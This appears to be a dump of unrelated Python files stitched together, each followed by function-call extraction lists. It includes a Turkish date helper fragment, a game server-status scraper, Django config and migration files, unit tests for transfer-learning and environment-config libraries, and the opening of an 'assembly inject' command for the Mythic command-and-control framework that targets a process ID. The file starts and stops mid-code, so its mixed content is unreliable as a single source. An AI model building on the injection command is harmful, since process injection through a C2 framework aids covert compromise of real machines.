elif gun=="Saturday":
gun="Cumartesi"
elif gun=="Sunday":
gun="Pazar"
if ay=="January":
ay="Ocak"
elif ay=="February":
ay="Şubat"
elif ay=="March":
ay="Mart"
elif ay=="April":
ay="Nisan"
elif ay=="May":
ay="Mayıs"
elif ay=="June":
ay="Haziran"
elif ay=="July":
ay="Temmuz"
elif ay=="August":
ay="Ağustos"
elif ay=="September":
ay="Eylül"
elif ay=="October":
ay="Ekim"
elif ay=="November":
ay="Kasım"
elif ay=="December":
ay="Aralık"
except: return "Tarih, saati alırken hata ile karşılaştım."
else:
if text.startswith("saat") or text.startswith("dakika") or text.startswith("saniye"):
return saat+":"+dakika+":"+saniye
elif text.startswith("tarih"):
return gun+"/"+ay+"/"+yil+" "+saat+":"+dakika+":"+saniye
elif text.startswith("gün") or text.startswith("gun"):
return gun
elif text.startswith("ay"):
return ay
elif text.startswith("yıl") or text.startswith("yil"):
return yil | [
"datetime.datetime.now"
] | [((66, 85), 'datetime.datetime.now', 'suan.datetime.now', ([], {}), '()\n', (83, 85), True, 'import datetime as suan\n')] |
import requests
import atexit
from apscheduler.schedulers.background import BackgroundScheduler
from bs4 import BeautifulSoup
class lodeStoneScraper:
def __init__(self):
self.__URL = 'https://na.finalfantasyxiv.com/lodestone/worldstatus/'
self.__statistics = {}
self.update_page()
# Setup scheduler
self.__scheduler = BackgroundScheduler()
self.__scheduler.add_job(func=self.update_page, trigger='interval', seconds=15)
self.__scheduler.start()
# Setup atexit
atexit.register(lambda: self.__scheduler.shutdown())
# Called to update the stored information on the servers
def update_page(self):
# Save old data
temp = self.__statistics
try:
# Get the page content and parse it
page = requests.get(self.__URL)
page = BeautifulSoup(page.content, 'html.parser')
# Extract the relevant divs
server_names = page.find_all('div', class_='world-list__world_name')
server_types = page.find_all('div', class_='world-list__world_category')
server_char_status = page.find_all('div', class_='world-list__create_character')
server_online_status = page.find_all('div', class_='world-list__status_icon')
# Parse into text
server_names = self.__parse_name(server_names)
server_types = self.__parse_type(server_types)
server_char_status = self.__parse_char_status(server_char_status)
server_online_status = self.__parse_server_online_status(server_online_status)
# Collate the data
for x in range(0, len(server_names)):
self.__statistics[server_names[x]] = [server_types[x], server_char_status[x], server_online_status[x]]
except Exception as e:
# If update failed, restore old data
self.__statistics = temp
# Log error
print(f'An exception occurred while trying to update data: {e}')
# Returns the currently stored data dictionary
def get_data(self):
return self.__statistics
# Parses server names from raw html
def __parse_name(self, server_names):
names = []
for server in server_names:
names.append(server.find('p').getText())
return names
# Parses server types from the raw html (Standard or Preferred)
def __parse_type(self, server_types):
types = []
for item in server_types:
temp = item.find('p').getText()
# If the server is offline this will return '--', set to an empty string
if temp == '--':
types.append('')
else:
types.append(temp)
return types
# Parses character creation status from the raw html (True = CC Available, False = CC Unavailable)
def __parse_char_status(self, server_char_status):
char_states = []
for item in server_char_status:
try:
state = item.i['data-tooltip']
if 'Available' in state:
char_states.append(True)
else:
char_states.append(False)
# An exception occurs when the server is offline, catch this and append false (no creation on an offline world)
except Exception:
char_states.append(False)
return char_states
# Parses whether a server is online from the raw html (True = Online, False = Server offline)
def __parse_server_online_status(self, server_online_status):
online_states = []
for item in server_online_status:
state = item.i['data-tooltip']
if 'Online' in state:
online_states.append(True)
else:
online_states.append(False)
return online_states | [
"bs4.BeautifulSoup",
"requests.get",
"apscheduler.schedulers.background.BackgroundScheduler"
] | [((365, 386), 'apscheduler.schedulers.background.BackgroundScheduler', 'BackgroundScheduler', ([], {}), '()\n', (384, 386), False, 'from apscheduler.schedulers.background import BackgroundScheduler\n'), ((820, 844), 'requests.get', 'requests.get', (['self.__URL'], {}), '(self.__URL)\n', (832, 844), False, 'import requests\n'), ((864, 906), 'bs4.BeautifulSoup', 'BeautifulSoup', (['page.content', '"""html.parser"""'], {}), "(page.content, 'html.parser')\n", (877, 906), False, 'from bs4 import BeautifulSoup\n')] |
"""
WSGI config for test_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# test_project directory.
app_path = os.path.dirname(os.path.abspath(__file__)).replace('/config', '')
sys.path.append(os.path.join(app_path, 'test_project'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.base")
application = get_wsgi_application()
| [
"os.environ.setdefault",
"django.core.wsgi.get_wsgi_application",
"os.path.join",
"os.path.abspath"
] | [((519, 590), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""config.settings.base"""'], {}), "('DJANGO_SETTINGS_MODULE', 'config.settings.base')\n", (540, 590), False, 'import os\n'), ((606, 628), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (626, 628), False, 'from django.core.wsgi import get_wsgi_application\n'), ((478, 516), 'os.path.join', 'os.path.join', (['app_path', '"""test_project"""'], {}), "(app_path, 'test_project')\n", (490, 516), False, 'import os\n'), ((412, 437), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (427, 437), False, 'import os\n')] |
# Generated by Django 2.1.1 on 2020-04-05 06:12
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Response',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('location', models.CharField(max_length=200)),
('email', models.EmailField(max_length=200)),
('cough', models.FileField(upload_to='')),
('uploaded_at', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"django.db.models.EmailField",
"django.db.models.FileField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((304, 397), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (320, 397), False, 'from django.db import migrations, models\n'), ((421, 453), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (437, 453), False, 'from django.db import migrations, models\n'), ((485, 517), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (501, 517), False, 'from django.db import migrations, models\n'), ((546, 579), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (563, 579), False, 'from django.db import migrations, models\n'), ((608, 638), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': '""""""'}), "(upload_to='')\n", (624, 638), False, 'from django.db import migrations, models\n'), ((673, 712), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (693, 712), False, 'from django.db import migrations, models\n')] |
from ctypes.util import find_library as _find_library
print(_find_library('sndfile'))
print('test fine')
| [
"ctypes.util.find_library"
] | [((61, 85), 'ctypes.util.find_library', '_find_library', (['"""sndfile"""'], {}), "('sndfile')\n", (74, 85), True, 'from ctypes.util import find_library as _find_library\n')] |
"""
Test functions for regular module.
"""
import pytest
import numpy as np
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.base import clone
import tensorflow as tf
from tensorflow.keras import Sequential, Model
from tensorflow.keras.layers import Dense
from tensorflow.keras.optimizers import Adam
from adapt.parameter_based import (RegularTransferLR,
RegularTransferLC,
RegularTransferNN)
np.random.seed(0)
Xs = np.concatenate((
np.random.randn(50)*0.1,
np.random.randn(50)*0.1 + 1.,
)).reshape(-1, 1)
Xt = (np.random.randn(100) * 0.1).reshape(-1, 1)
ys_reg = np.array([0.2 * x if x<0.5 else
10 for x in Xs.ravel()]).reshape(-1, 1)
yt_reg = np.array([0.2 * x if x<0.5 else
10 for x in Xt.ravel()]).reshape(-1, 1)
ys_classif = np.sign(np.array(
[x<0 if x<0.5 else x<1 for x in Xs.ravel()]
).astype(float) - 0.5).reshape(-1, 1)
yt_classif = np.sign(np.array(
[x<0 if x<0.5 else x<1 for x in Xt.ravel()]
).astype(float) - 0.5).reshape(-1, 1)
def _get_network(input_shape=(1,), output_shape=(1,)):
model = Sequential()
model.add(Dense(np.prod(output_shape),
input_shape=input_shape,
use_bias=False))
model.compile(loss="mse", optimizer=Adam(0.1))
return model
def test_setup():
lr = LinearRegression(fit_intercept=False)
lr.fit(Xs, ys_reg)
assert np.abs(lr.coef_[0][0] - 10) < 1
lr = LogisticRegression(penalty='none', solver='lbfgs')
lr.fit(Xs, ys_classif)
assert (lr.predict(Xt) == yt_classif.ravel()).sum() < 70
def test_regularlr_fit():
np.random.seed(0)
lr = LinearRegression(fit_intercept=False)
lr.fit(Xs, ys_reg)
model = RegularTransferLR(lr, lambda_=0.)
model.fit(Xt, yt_reg)
assert np.abs(model.estimator_.coef_[0] - 0.2) < 1
assert np.abs(model.predict(Xt) - yt_reg).sum() < 2
model = RegularTransferLR(lr, lambda_=1000000)
model.fit(Xt, yt_reg)
assert np.abs(model.estimator_.coef_[0] - 10) < 1
assert np.abs(model.estimator_.coef_[0] - lr.coef_[0]) < 0.001
model = RegularTransferLR(lr, lambda_=1.)
model.fit(Xt, yt_reg)
assert np.abs(model.estimator_.coef_[0] - 4) < 1
def test_regularlr_multioutput():
np.random.seed(0)
X = np.random.randn(100, 5)+2.
y = X[:, :2]
lr = LinearRegression()
lr.fit(X, y)
model = RegularTransferLR(lr, lambda_=1.)
model.fit(X, y)
assert np.abs(model.predict(X) - y).sum() < 2
assert np.all(model.coef_.shape == (2, 5))
assert np.all(model.intercept_.shape == (2,))
assert model.score(X, y) > 0.9
def test_regularlr_error():
np.random.seed(0)
Xs = np.random.randn(100, 5)
Xt = np.random.randn(100, 5)
ys = np.random.randn(100)
yt = np.random.randn(100)
lr = LinearRegression()
lr.fit(Xs, ys)
model = RegularTransferLR(lr, lambda_=1.)
model.fit(Xt, yt)
with pytest.raises(ValueError) as excinfo:
model.fit(np.random.randn(100, 4), yt)
assert "expected 5, got 4" in str(excinfo.value)
with pytest.raises(ValueError) as excinfo:
model.fit(Xt, np.random.randn(100, 2))
assert "expected 1, got 2" in str(excinfo.value)
def test_regularlc_fit():
np.random.seed(0)
lr = LogisticRegression(penalty='none', solver='lbfgs')
lr.fit(Xs, ys_classif)
model = RegularTransferLC(lr, lambda_=0)
model.fit(Xt, yt_classif)
assert (model.predict(Xt) == yt_classif.ravel()).sum() > 90
model = RegularTransferLC(lr, lambda_=100000000)
model.fit(Xt, yt_classif)
assert (model.predict(Xt) == yt_classif.ravel()).sum() < 70
assert np.abs(model.estimator_.coef_[0][0] - lr.coef_[0][0]) < 0.001
assert np.abs(model.estimator_.intercept_ - lr.intercept_[0]) < 0.001
model = RegularTransferLC(lr, lambda_=1.2)
model.fit(Xt, yt_classif)
assert (model.predict(Xt) == yt_classif.ravel()).sum() > 95
def test_regularlc_multiclass():
np.random.seed(0)
X = np.random.randn(100, 5)
y = np.zeros(len(X))
y[X[:, :2].sum(1)<0] = 1
y[X[:, 3:].sum(1)>0] = 2
lr = LogisticRegression(penalty='none', solver='lbfgs')
lr.fit(X, y)
model = RegularTransferLC(lr, lambda_=1.)
model.fit(X, y)
assert (model.predict(X) == y).sum() > 90
assert np.all(model.coef_.shape == (3, 5))
assert np.all(model.intercept_.shape == (3,))
assert model.score(X, y) > 0.9
def test_regularnn_fit():
tf.random.set_seed(0)
np.random.seed(0)
network = _get_network()
network.fit(Xs, ys_reg, epochs=100, batch_size=100, verbose=0)
model = RegularTransferNN(network, lambdas=0., optimizer=Adam(0.1))
model.fit(Xt, yt_reg, epochs=100, batch_size=100, verbose=0)
# assert np.abs(network.predict(Xs) - ys_reg).sum() < 1
assert np.sum(np.abs(network.get_weights()[0] - model.get_weights()[0])) > 4.
assert np.abs(model.predict(Xt) - yt_reg).sum() < 10
model = RegularTransferNN(network, lambdas=10000000., optimizer=Adam(0.1))
model.fit(Xt, yt_reg, epochs=100, batch_size=100, verbose=0)
assert np.sum(np.abs(network.get_weights()[0] - model.get_weights()[0])) < 0.001
assert np.abs(model.predict(Xt) - yt_reg).sum() > 10
def test_regularnn_reg():
tf.random.set_seed(0)
np.random.seed(0)
network = _get_network()
network.fit(Xs, ys_reg, epochs=100, batch_size=100, verbose=0)
model = RegularTransferNN(network, regularizer="l1")
model.fit(Xt, yt_reg, epochs=100, batch_size=100, verbose=0)
with pytest.raises(ValueError) as excinfo:
model = RegularTransferNN(network, regularizer="l3")
assert "l1' or 'l2', got, l3" in str(excinfo.value)
def test_clone():
Xs = np.random.randn(100, 5)
ys = np.random.choice(2, 100)
lr = LinearRegression()
lr.fit(Xs, ys)
model = RegularTransferLR(lr, lambda_=1.)
model.fit(Xs, ys)
new_model = clone(model)
new_model.fit(Xs, ys)
new_model.predict(Xs);
assert model is not new_model
lr = LogisticRegression(penalty='none', solver='lbfgs')
lr.fit(Xs, ys)
model = RegularTransferLC(lr, lambda_=1.)
model.fit(Xs, ys)
new_model = clone(model)
new_model.fit(Xs, ys)
new_model.predict(Xs);
assert model is not new_model | [
"numpy.abs",
"numpy.prod",
"adapt.parameter_based.RegularTransferLR",
"tensorflow.random.set_seed",
"tensorflow.keras.Sequential",
"adapt.parameter_based.RegularTransferNN",
"numpy.random.choice",
"sklearn.base.clone",
"sklearn.linear_model.LogisticRegression",
"tensorflow.keras.optimizers.Adam",
... | [((500, 517), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (514, 517), True, 'import numpy as np\n'), ((1173, 1185), 'tensorflow.keras.Sequential', 'Sequential', ([], {}), '()\n', (1183, 1185), False, 'from tensorflow.keras import Sequential, Model\n'), ((1408, 1445), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {'fit_intercept': '(False)'}), '(fit_intercept=False)\n', (1424, 1445), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((1526, 1576), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', solver='lbfgs')\n", (1544, 1576), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((1697, 1714), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (1711, 1714), True, 'import numpy as np\n'), ((1724, 1761), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {'fit_intercept': '(False)'}), '(fit_intercept=False)\n', (1740, 1761), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((1797, 1831), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(0.0)'}), '(lr, lambda_=0.0)\n', (1814, 1831), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((1985, 2023), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1000000)'}), '(lr, lambda_=1000000)\n', (2002, 2023), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((2188, 2222), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (2205, 2222), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((2349, 2366), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (2363, 2366), True, 'import numpy as np\n'), ((2428, 2446), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2444, 2446), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((2476, 2510), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (2493, 2510), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((2591, 2626), 'numpy.all', 'np.all', (['(model.coef_.shape == (2, 5))'], {}), '(model.coef_.shape == (2, 5))\n', (2597, 2626), True, 'import numpy as np\n'), ((2638, 2676), 'numpy.all', 'np.all', (['(model.intercept_.shape == (2,))'], {}), '(model.intercept_.shape == (2,))\n', (2644, 2676), True, 'import numpy as np\n'), ((2754, 2771), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (2768, 2771), True, 'import numpy as np\n'), ((2781, 2804), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (2796, 2804), True, 'import numpy as np\n'), ((2814, 2837), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (2829, 2837), True, 'import numpy as np\n'), ((2847, 2867), 'numpy.random.randn', 'np.random.randn', (['(100)'], {}), '(100)\n', (2862, 2867), True, 'import numpy as np\n'), ((2877, 2897), 'numpy.random.randn', 'np.random.randn', (['(100)'], {}), '(100)\n', (2892, 2897), True, 'import numpy as np\n'), ((2907, 2925), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2923, 2925), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((2957, 2991), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (2974, 2991), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((3351, 3368), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (3365, 3368), True, 'import numpy as np\n'), ((3378, 3428), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', solver='lbfgs')\n", (3396, 3428), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((3468, 3500), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(0)'}), '(lr, lambda_=0)\n', (3485, 3500), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((3612, 3652), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(100000000)'}), '(lr, lambda_=100000000)\n', (3629, 3652), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((3911, 3945), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(1.2)'}), '(lr, lambda_=1.2)\n', (3928, 3945), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((4087, 4104), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (4101, 4104), True, 'import numpy as np\n'), ((4113, 4136), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (4128, 4136), True, 'import numpy as np\n'), ((4229, 4279), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', solver='lbfgs')\n", (4247, 4279), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((4309, 4343), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (4326, 4343), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((4420, 4455), 'numpy.all', 'np.all', (['(model.coef_.shape == (3, 5))'], {}), '(model.coef_.shape == (3, 5))\n', (4426, 4455), True, 'import numpy as np\n'), ((4467, 4505), 'numpy.all', 'np.all', (['(model.intercept_.shape == (3,))'], {}), '(model.intercept_.shape == (3,))\n', (4473, 4505), True, 'import numpy as np\n'), ((4573, 4594), 'tensorflow.random.set_seed', 'tf.random.set_seed', (['(0)'], {}), '(0)\n', (4591, 4594), True, 'import tensorflow as tf\n'), ((4599, 4616), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (4613, 4616), True, 'import numpy as np\n'), ((5385, 5406), 'tensorflow.random.set_seed', 'tf.random.set_seed', (['(0)'], {}), '(0)\n', (5403, 5406), True, 'import tensorflow as tf\n'), ((5411, 5428), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (5425, 5428), True, 'import numpy as np\n'), ((5537, 5581), 'adapt.parameter_based.RegularTransferNN', 'RegularTransferNN', (['network'], {'regularizer': '"""l1"""'}), "(network, regularizer='l1')\n", (5554, 5581), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((5854, 5877), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (5869, 5877), True, 'import numpy as np\n'), ((5887, 5911), 'numpy.random.choice', 'np.random.choice', (['(2)', '(100)'], {}), '(2, 100)\n', (5903, 5911), True, 'import numpy as np\n'), ((5921, 5939), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (5937, 5939), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((5971, 6005), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (5988, 6005), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((6048, 6060), 'sklearn.base.clone', 'clone', (['model'], {}), '(model)\n', (6053, 6060), False, 'from sklearn.base import clone\n'), ((6162, 6212), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', solver='lbfgs')\n", (6180, 6212), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((6244, 6278), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (6261, 6278), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((6321, 6333), 'sklearn.base.clone', 'clone', (['model'], {}), '(model)\n', (6326, 6333), False, 'from sklearn.base import clone\n'), ((1480, 1507), 'numpy.abs', 'np.abs', (['(lr.coef_[0][0] - 10)'], {}), '(lr.coef_[0][0] - 10)\n', (1486, 1507), True, 'import numpy as np\n'), ((1868, 1907), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - 0.2)'], {}), '(model.estimator_.coef_[0] - 0.2)\n', (1874, 1907), True, 'import numpy as np\n'), ((2061, 2099), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - 10)'], {}), '(model.estimator_.coef_[0] - 10)\n', (2067, 2099), True, 'import numpy as np\n'), ((2115, 2162), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - lr.coef_[0])'], {}), '(model.estimator_.coef_[0] - lr.coef_[0])\n', (2121, 2162), True, 'import numpy as np\n'), ((2259, 2296), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - 4)'], {}), '(model.estimator_.coef_[0] - 4)\n', (2265, 2296), True, 'import numpy as np\n'), ((2375, 2398), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (2390, 2398), True, 'import numpy as np\n'), ((3027, 3052), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3040, 3052), False, 'import pytest\n'), ((3180, 3205), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3193, 3205), False, 'import pytest\n'), ((3758, 3811), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0][0] - lr.coef_[0][0])'], {}), '(model.estimator_.coef_[0][0] - lr.coef_[0][0])\n', (3764, 3811), True, 'import numpy as np\n'), ((3831, 3885), 'numpy.abs', 'np.abs', (['(model.estimator_.intercept_ - lr.intercept_[0])'], {}), '(model.estimator_.intercept_ - lr.intercept_[0])\n', (3837, 3885), True, 'import numpy as np\n'), ((5661, 5686), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5674, 5686), False, 'import pytest\n'), ((5716, 5760), 'adapt.parameter_based.RegularTransferNN', 'RegularTransferNN', (['network'], {'regularizer': '"""l3"""'}), "(network, regularizer='l3')\n", (5733, 5760), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((627, 647), 'numpy.random.randn', 'np.random.randn', (['(100)'], {}), '(100)\n', (642, 647), True, 'import numpy as np\n'), ((1206, 1227), 'numpy.prod', 'np.prod', (['output_shape'], {}), '(output_shape)\n', (1213, 1227), True, 'import numpy as np\n'), ((1351, 1360), 'tensorflow.keras.optimizers.Adam', 'Adam', (['(0.1)'], {}), '(0.1)\n', (1355, 1360), False, 'from tensorflow.keras.optimizers import Adam\n'), ((3084, 3107), 'numpy.random.randn', 'np.random.randn', (['(100)', '(4)'], {}), '(100, 4)\n', (3099, 3107), True, 'import numpy as np\n'), ((3241, 3264), 'numpy.random.randn', 'np.random.randn', (['(100)', '(2)'], {}), '(100, 2)\n', (3256, 3264), True, 'import numpy as np\n'), ((4774, 4783), 'tensorflow.keras.optimizers.Adam', 'Adam', (['(0.1)'], {}), '(0.1)\n', (4778, 4783), False, 'from tensorflow.keras.optimizers import Adam\n'), ((5122, 5131), 'tensorflow.keras.optimizers.Adam', 'Adam', (['(0.1)'], {}), '(0.1)\n', (5126, 5131), False, 'from tensorflow.keras.optimizers import Adam\n'), ((544, 563), 'numpy.random.randn', 'np.random.randn', (['(50)'], {}), '(50)\n', (559, 563), True, 'import numpy as np\n'), ((573, 592), 'numpy.random.randn', 'np.random.randn', (['(50)'], {}), '(50)\n', (588, 592), True, 'import numpy as np\n')] |
import unittest
from multienv.config import Config
from multienv.env_var import EnvVar
from multienv.exceptions import InvalidYamlFileException, \
EnvVarContainerBuildNotFoundException
class EnvVarTestCase(unittest.TestCase):
def test_get_containers_to_rebuild_with_existent_env_var(self):
config = Config(
env_var_container_build='tests/fixtures/'
'env_var_container_build.yml')
env_var = EnvVar('PHP_VERSION', 7.1, config)
self.assertEqual(
env_var.get_containers_to_rebuild(),
['php-fpm', 'workspace']
)
def test_get_containers_to_rebuild_with_not_exists_env_var(self):
config = Config(
env_var_container_build='tests/fixtures/'
'env_var_container_build.yml')
env_var = EnvVar('MYSQL_VERSION', 5.7, config)
self.assertEqual(env_var.get_containers_to_rebuild(), [])
def test_get_containers_to_rebuild_with_invalid_config(self):
with self.assertRaises(InvalidYamlFileException):
config = Config(
env_var_container_build='tests/fixtures'
'/invalid_env_var_container_build.yml')
env_var = EnvVar('MYSQL_VERSION', 5.7, config)
env_var.get_containers_to_rebuild()
def test_get_containers_to_rebuild_with_not_existent_config(self):
with self.assertRaises(EnvVarContainerBuildNotFoundException):
config = Config(
env_var_container_build='not_found/'
'env_var_container_build.yml')
env_var = EnvVar('MYSQL_VERSION', 5.7, config)
env_var.get_containers_to_rebuild()
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"multienv.config.Config",
"multienv.env_var.EnvVar"
] | [((1794, 1809), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1807, 1809), False, 'import unittest\n'), ((318, 394), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""tests/fixtures/env_var_container_build.yml"""'}), "(env_var_container_build='tests/fixtures/env_var_container_build.yml')\n", (324, 394), False, 'from multienv.config import Config\n'), ((465, 499), 'multienv.env_var.EnvVar', 'EnvVar', (['"""PHP_VERSION"""', '(7.1)', 'config'], {}), "('PHP_VERSION', 7.1, config)\n", (471, 499), False, 'from multienv.env_var import EnvVar\n'), ((710, 786), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""tests/fixtures/env_var_container_build.yml"""'}), "(env_var_container_build='tests/fixtures/env_var_container_build.yml')\n", (716, 786), False, 'from multienv.config import Config\n'), ((857, 893), 'multienv.env_var.EnvVar', 'EnvVar', (['"""MYSQL_VERSION"""', '(5.7)', 'config'], {}), "('MYSQL_VERSION', 5.7, config)\n", (863, 893), False, 'from multienv.env_var import EnvVar\n'), ((1106, 1195), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""tests/fixtures/invalid_env_var_container_build.yml"""'}), "(env_var_container_build=\n 'tests/fixtures/invalid_env_var_container_build.yml')\n", (1112, 1195), False, 'from multienv.config import Config\n'), ((1273, 1309), 'multienv.env_var.EnvVar', 'EnvVar', (['"""MYSQL_VERSION"""', '(5.7)', 'config'], {}), "('MYSQL_VERSION', 5.7, config)\n", (1279, 1309), False, 'from multienv.env_var import EnvVar\n'), ((1522, 1593), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""not_found/env_var_container_build.yml"""'}), "(env_var_container_build='not_found/env_var_container_build.yml')\n", (1528, 1593), False, 'from multienv.config import Config\n'), ((1676, 1712), 'multienv.env_var.EnvVar', 'EnvVar', (['"""MYSQL_VERSION"""', '(5.7)', 'config'], {}), "('MYSQL_VERSION', 5.7, config)\n", (1682, 1712), False, 'from multienv.env_var import EnvVar\n')] |
from mythic_payloadtype_container.MythicCommandBase import *
import json
from uuid import uuid4
from os import path
from mythic_payloadtype_container.MythicRPC import *
import base64
import donut
class AssemblyInjectArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"pid": CommandParameter(name="PID", type=ParameterType.Number, description="Process ID to inject into."),
"assembly_name": CommandParameter(name="Assembly Name", type=ParameterType.String, description="Name of the assembly to execute."),
"assembly_arguments": CommandParameter(name="Assembly Arguments", type=ParameterType.String, description="Arguments to pass to the assembly."),
}
async def parse_arguments(self):
if self.command_line[0] == "{":
self.load_args_from_json_string(self.command_line)
else:
parts = self.command_line.split(" ", maxsplit=2)
if len(parts) < 2:
